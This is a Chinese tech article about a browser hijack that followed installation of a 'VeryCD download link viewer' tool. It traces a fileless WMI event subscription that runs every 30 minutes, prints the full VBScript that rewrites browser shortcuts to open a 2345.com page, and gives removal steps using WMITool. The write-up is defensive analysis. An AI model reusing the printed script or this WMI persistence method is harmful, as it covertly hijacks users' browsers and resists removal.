编辑:秩名2023-06-05 20:30:02
近日在网上相续看到有网友表示自己在下载使用了VeryCD下载链接查看器这款工具以后,再打开浏览器就被直接跳转到 www.2345.com/?kunown 这个导航页面了,而且打开多个浏览器:IE、Chrome、Firefox、Opera、Safari、Maxthon,均相同症状,检查浏览器首页设置均正常!
最后发现,原来快速启动栏的IE浏览器快捷命令被其修改,修改后的类似如下图,于是认为就是普通的修改快捷方式,手工删除 2345 网址的部分,但半小时后再次被更改了。考虑到可能加载了启动项,在注册表、启动项、服务等中均未查找到相关信息,重启后IE快捷方式被重新篡改。尝试了事件查看器和任务计划,均未在里面查出任何信息。
之后又安装了超级兔子、360、exterminateit等工具进行检查,也未检出。
打开ProcessMonitor进行监视,发现每隔30分钟出现一个scrcons.exe进程自动启动并修改快速启动栏的命令,然后自动关闭(幸亏是30分钟一次,你要是24小时一次,那我就杯具了),修改Win7下opera快速启动图标路径类似如下:
C:⁄Users⁄iefans⁄AppData⁄Roaming⁄Microsoft⁄Internet Explorer⁄Quick Launch⁄User Pinned⁄TaskBar⁄Opera12.01 1532.lnk
查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。要查看WMI事件,到以下地址下载WMITool并安装
http://www.microsoft.com/en-us/download/details.aspx?id=24045
安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入root⁄subscription(手工复制粘贴啊,默认出现的不是这个),确定,出现下图:
点击左侧_EventFilter:Name=unown_filter,再至右侧右键点击ActiveScriptEventConsume r Name=unown,右键选择view instant properties,如下图:
查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上http://www.2345.com/?kunown!抓住你了~!隐藏的够深,没常驻进程,没有文件(把自己存储在WMI数据库中)。
受到影响的浏览器有(各色浏览器,差不多齐了):
IEXPLORE.EXE, chrome.exe, firefox.exe, 360chrome.exe, 360SE.exe, SogouExplorer.exe, opera.exe, Safari.exe, Maxthon.exe, TTraveler.exe, TheWorld.exe, baidubrowser.exe, liebao.exe, QQBrowser.exe
具体代码如下:
On Error Resume Next:Const link = http://www.2345.com/?kunown:browsers = Array(IEXPLORE.EXE, chrome.exe, firefox.exe, 360chrome.exe, 360SE.exe, SogouExplorer.exe, opera.exe, Safari.exe, Maxthon.exe, TTraveler.exe, TheWorld.exe, baidubrowser.exe, liebao.exe, QQBrowser.exe):Set oDic = CreateObject(scripting.dictionary):For Each browser In browsers:oDic.Add LCase(browser), browser:Next:Set fso = CreateObject(Scripting.Filesystemobject):Set WshShell = CreateObject(Wscript.Shell):strDesktop = C:⁄Users⁄Gemini⁄Desktop:strAllUsersDesktop = WshShell.SpecialFolders(AllUsersDesktop):QuickLaunch = C:⁄Users⁄Gemini⁄AppData⁄Roaming⁄Microsoft⁄Internet Explorer⁄Quick Launch:UserPinnedStartMenu = QuickLaunch ⁄User Pinned⁄StartMenu:UserPinnedTaskBar = QuickLaunch ⁄User Pinned⁄TaskBar:For Each file In fso.GetFolder(strDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = lnk Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) . fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = lnk Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) . fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file In fso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) = lnk Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) . fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedStartMenu) Then:For Each file In fso.GetFolder(UserPinnedStartMenu).Files:If LCase(fso.GetExtensionName(file.Path)) = lnk Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) . fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each file In fso.GetFolder(UserPinnedTaskBar).Files:If LCase(fso.GetExtensionName(file.Path)) = lnk Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) . fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If
最后,清除方法:在WMI event viewer中将_EventFilter:Name=unown_filter项目右键删除!
删不掉?
到WMITool安装路径(例如:C:⁄Program Files (x86)⁄WMI Tools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!删之!
还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉!
暂时就这么多了,还有没有其它影响的话,用用再看吧!
解决方法来自:Gemini
